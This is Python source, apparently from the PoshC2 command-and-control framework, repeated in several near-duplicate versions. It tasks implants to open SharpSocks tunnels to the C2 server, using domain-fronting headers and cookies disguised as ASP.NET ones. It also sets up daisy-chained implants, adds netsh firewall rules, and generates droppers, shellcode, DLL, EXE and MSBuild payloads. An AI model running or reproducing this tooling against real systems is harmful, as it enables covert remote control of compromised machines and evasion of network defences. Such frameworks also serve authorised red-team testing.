def do_sharpsocks(user, command, randomuri): check_module_loaded("SharpSocks.ps1", randomuri, user) import string from random import choice allchar = string.ascii_letters channel = "".join(choice(allchar) for x in range(25)) sharpkey = gen_key().decode("utf-8") sharpurls = get_sharpurls() sharpurl = get_first_url(select_item("PayloadCommsHost", "C2Server"), select_item("DomainFrontHeader", "C2Server")) dfheader = get_first_dfheader(select_item("DomainFrontHeader", "C2Server")) implant = get_implantdetails(randomuri) pivot = implant.Pivot if pivot != "PS": sharpurl = input("Enter the URL for SharpSocks: ") print("sharpsocks -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN) ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ") if ri.lower() == "n": print("") if (ri == "") or (ri.lower() == "y"): taskcmd = "Sharpsocks -Client -Uri %s -Channel %s -Key %s -URLs %s -Insecure -Beacon 1000" % ( sharpurl, channel, sharpkey, sharpurls) if dfheader: taskcmd += " -DomainFrontURL %s" % dfheader new_task(taskcmd, user, randomuri) update_label("SharpSocks", randomuri)
def do_sharpsocks(user, command, randomuri): from random import choice allchar = string.ascii_letters channel = "".join(choice(allchar) for x in range(25)) sharpkey = gen_key().decode("utf-8") sharpurls = get_sharpurls() sharpurls = sharpurls.split(",") sharpurl = select_item("PayloadCommsHost", "C2Server").replace('"', '').split(',')[0] user_agent = select_item("UserAgent", "C2Server") dfheader = get_first_dfheader(select_item("DomainFrontHeader", "C2Server")) print( "\nIf using Docker, change the SocksHost to be the IP of the PoshC2 Server not 127.0.0.1:49031" ) print( "sharpsocks -t latest -s \"-c=%s -k=%s --verbose -l=http://*:%s\"\r" % (channel, sharpkey, SocksHost.split(":")[2]) + Colours.GREEN) print("\nElse\n") print("sharpsocks -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN) ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ") if ri == "": if dfheader: new_task( "run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken -df %s --user-agent \"%s\"" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", ""), dfheader, user_agent), user, randomuri) else: new_task( "run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken --user-agent \"%s\"" % (sharpurl, channel, sharpkey, sharpurls[0].replace( "\"", ""), sharpurls[1].replace("\"", ""), user_agent), user, randomuri) if ri.lower() == "y": if dfheader: new_task( "run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken -df %s --user-agent \"%s\"" % (sharpurl, channel, sharpkey, sharpurls[0].replace("\"", ""), sharpurls[1].replace("\"", ""), dfheader, user_agent), user, randomuri) else: new_task( "run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken --user-agent \"%s\"" % (sharpurl, channel, sharpkey, sharpurls[0].replace( "\"", ""), sharpurls[1].replace("\"", ""), user_agent), user, randomuri) print("SharpSocks task issued, to stop SharpSocks run stopsocks")
def do_sharpsocks(user, command, randomuri): from random import choice allchar = string.ascii_letters channel = "".join(choice(allchar) for x in range(25)) sharpkey = gen_key().decode("utf-8") sharpurls = get_sharpurls() sharpurls = sharpurls.split(",") sharpurl = get_first_url(select_item("PayloadCommsHost", "C2Server"), select_item("DomainFrontHeader", "C2Server")) dfheader = get_first_dfheader(select_item("DomainFrontHeader", "C2Server")) print("sharpsocks -c=%s -k=%s --verbose -l=%s\r\n" % (channel, sharpkey, SocksHost) + Colours.GREEN) ri = input("Are you ready to start the SharpSocks in the implant? (Y/n) ") if ri == "": if dfheader: new_task( "run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken -df %s" % (sharpurl, channel, sharpkey, sharpurls[0].replace( "\"", ""), sharpurls[1].replace("\"", ""), dfheader), user, randomuri) else: new_task( "run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken" % (sharpurl, channel, sharpkey, sharpurls[0].replace( "\"", ""), sharpurls[1].replace("\"", "")), user, randomuri) if ri.lower() == "y": if dfheader: new_task( "run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken -df %s" % (sharpurl, channel, sharpkey, sharpurls[0].replace( "\"", ""), sharpurls[1].replace("\"", ""), dfheader), user, randomuri) else: new_task( "run-exe SharpSocksImplantTestApp.Program SharpSocks -s %s -c %s -k %s -url1 %s -url2 %s -b 1000 --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken" % (sharpurl, channel, sharpkey, sharpurls[0].replace( "\"", ""), sharpurls[1].replace("\"", "")), user, randomuri) print("SharpSocks task issued, to stop SharpSocks run stopsocks")
def do_startdaisy(user, command, randomuri): check_module_loaded("invoke-daisychain.ps1", randomuri, user) elevated = input(Colours.GREEN + "Are you elevated? Y/n " + Colours.END) domain_front = "" proxy_user = "" proxy_pass = "" proxy_url = "" cred_expiry = "" if elevated.lower() == "n": cont = input( Colours.RED + "Daisy from an unelevated context can only bind to localhost, continue? y/N " + Colours.END) if cont.lower() == "n" or cont == "": return bind_ip = "localhost" else: bind_ip = input(Colours.GREEN + "Bind IP on the daisy host: " + Colours.END) bind_port = input(Colours.GREEN + "Bind Port on the daisy host: " + Colours.END) firstdaisy = input(Colours.GREEN + "Is this the first daisy in the chain? Y/n? " + Colours.END) default_url = get_first_url(PayloadCommsHost, DomainFrontHeader) default_df_header = get_first_dfheader(DomainFrontHeader) if default_df_header == default_url: default_df_header = None if firstdaisy.lower() == "y" or firstdaisy == "": upstream_url = input(Colours.GREEN + f"C2 URL (leave blank for {default_url}): " + Colours.END) domain_front = input( Colours.GREEN + f"Domain front header (leave blank for {str(default_df_header)}): " + Colours.END) proxy_user = input( Colours.GREEN + "Proxy user (<domain>\\<username>, leave blank if none): " + Colours.END) proxy_pass = input(Colours.GREEN + "Proxy password (leave blank if none): " + Colours.END) proxy_url = input(Colours.GREEN + "Proxy URL (leave blank if none): " + Colours.END) cred_expiry = input( Colours.GREEN + "Password/Account Expiration Date: .e.g. 15/03/2018: ") if not upstream_url: upstream_url = default_url if not domain_front: if default_df_header: domain_front = default_df_header else: domain_front = "" else: upstream_daisy_host = input(Colours.GREEN + "Upstream daisy server: " + Colours.END) upstream_daisy_port = input(Colours.GREEN + "Upstream daisy port: " + Colours.END) upstream_url = f"http://{upstream_daisy_host}:{upstream_daisy_port}" command = f"invoke-daisychain -daisyserver http://{bind_ip} -port {bind_port} -c2server {upstream_url}" if domain_front: command = command + f" -domfront {domain_front}" if proxy_url: command = command + f" -proxyurl '{proxy_url}'" if proxy_user: command = command + f" -proxyuser '{proxy_user}'" if proxy_pass: command = command + f" -proxypassword '{proxy_pass}'" if elevated.lower() == "y" or elevated == "": firewall = input(Colours.GREEN + "Add firewall rule? (uses netsh.exe) y/N: ") if firewall.lower() == "n" or firewall == "": command = command + " -nofwrule" else: print_good( "Not elevated so binding to localhost and not adding firewall rule" ) command = command + " -localhost" urls = get_allurls() command = command + f" -urls '{urls}'" new_task(command, user, randomuri) update_label("DaisyHost", randomuri) createpayloads = input( Colours.GREEN + "Would you like to create payloads for this Daisy Server? Y/n ") if createpayloads.lower() == "y" or createpayloads == "": name = input(Colours.GREEN + "Enter a payload name: " + Colours.END) daisyhost = get_implantdetails(randomuri) proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}" C2 = get_c2server_all() urlId = new_urldetails(name, f"\"http://{bind_ip}:{bind_port}\"", "\"\"", proxy_url, proxy_user, proxy_pass, cred_expiry) newPayload = Payloads(C2.KillDate, C2.EncKey, C2.Insecure, C2.UserAgent, C2.Referrer, "%s?d" % get_newimplanturl(), PayloadsDirectory, URLID=urlId, PowerShellProxyCommand=proxynone) newPayload.PSDropper = (newPayload.PSDropper).replace( "$pid;%s" % (upstream_url), "$pid;%s@%s" % (daisyhost.User, daisyhost.Domain)) newPayload.CreateDroppers(name) newPayload.CreateRaw(name) newPayload.CreateDlls(name) newPayload.CreateShellcode(name) newPayload.CreateEXE(name) newPayload.CreateMsbuild(name) print_good("Created new %s daisy payloads" % name)
def do_sharpsocks(user, command, randomuri): style = Style.from_dict({ '': '#80d130', }) from random import choice channel = "".join(choice(string.ascii_letters) for _ in range(25)) sharp_key = gen_key().decode("utf-8") default_sharp_urls = get_sharpurls() urls_prompt = PromptSession(history=FileHistory( f'{PoshProjectDirectory}/.comma-separated-urls-history'), auto_suggest=AutoSuggestFromHistory(), style=style) socks_proxy_urls = urls_prompt.prompt( f"What URIs would you like to use for SharpSocks? Default is {default_sharp_urls.replace(' ', '')}: " ) if not socks_proxy_urls: socks_proxy_urls = default_sharp_urls socks_proxy_urls = socks_proxy_urls.split(",") if len(socks_proxy_urls) < 2: print("Please specify at least two URIs") return socks_proxy_urls = [i.replace("\"", "").strip() for i in socks_proxy_urls] socks_proxy_urls = [(i[1:] if i.startswith("/") else i) for i in socks_proxy_urls] default_sharp_url = select_item("PayloadCommsHost", "C2Server").replace('"', '').split(',')[0] domains_prompt = PromptSession(history=FileHistory( f'{PoshProjectDirectory}/.protocol-and-domain-history'), auto_suggest=AutoSuggestFromHistory(), style=style) sharp_url = domains_prompt.prompt( f"What domain would you like to use for SharpSocks? Default is {default_sharp_url}: " ) if not sharp_url: sharp_url = default_sharp_url if not sharp_url.startswith("http"): print("Please specify a protocol (http/https)") return default_host_header = get_first_dfheader( select_item("DomainFrontHeader", "C2Server")) host_headers_prompt = PromptSession(history=FileHistory( '%s/.host-headers-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) host_header = host_headers_prompt.prompt( f"What host header should used? Default is {default_host_header}: ") if not host_header: host_header = default_host_header default_user_agent = select_item("UserAgent", "C2Server") user_agent_prompt = PromptSession(history=FileHistory( '%s/.user-agents-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) user_agent = user_agent_prompt.prompt( f"What user agent? Default is \"{default_user_agent}\": ") if not user_agent: user_agent = default_user_agent default_beacon = "200" beacon_prompt = PromptSession(history=FileHistory('%s/.beacon-history' % PoshProjectDirectory), auto_suggest=AutoSuggestFromHistory(), style=style) beacon = beacon_prompt.prompt( f"What beacon interval would you like SharpSocks to use (ms)? Default: {default_beacon}ms: " ) if not beacon: beacon = default_beacon if beacon.strip().endswith("ms"): beacon = beacon.replace("ms", "").strip() server_command = f"{PoshInstallDirectory}resources/SharpSocks/SharpSocksServer/SharpSocksServer -c={channel} -k={sharp_key} -l={SocksHost} -v" if " -v" in command or " --verbose" in command: server_command += " --verbose" server_command += "\n" print( Colours.GREEN + "\nOk, run this command from your SharpSocksServer directory to launch the SharpSocks server:\n" ) print(server_command) task = f"run-exe SharpSocksImplant.Program SharpSocksImplant -s {sharp_url} -c {channel} -k {sharp_key} -url1 {socks_proxy_urls[0]} -url2 {socks_proxy_urls[1]} -b {beacon} -r {beacon} --session-cookie ASP.NET_SessionId --payload-cookie __RequestVerificationToken --user-agent \"{user_agent}\"" if host_header: task += f" -df {host_header}" extra_args = command.replace("sharpsocks ", "").strip() if extra_args: task += " " + extra_args confirm = input( "Are you ready to start the SharpSocks in the implant? (Y/n) ") if confirm == "" or confirm.lower() == "y": new_task(task, user, randomuri) else: print("Aborted...") return print("SharpSocks task issued, to stop SharpSocks run stopsocks")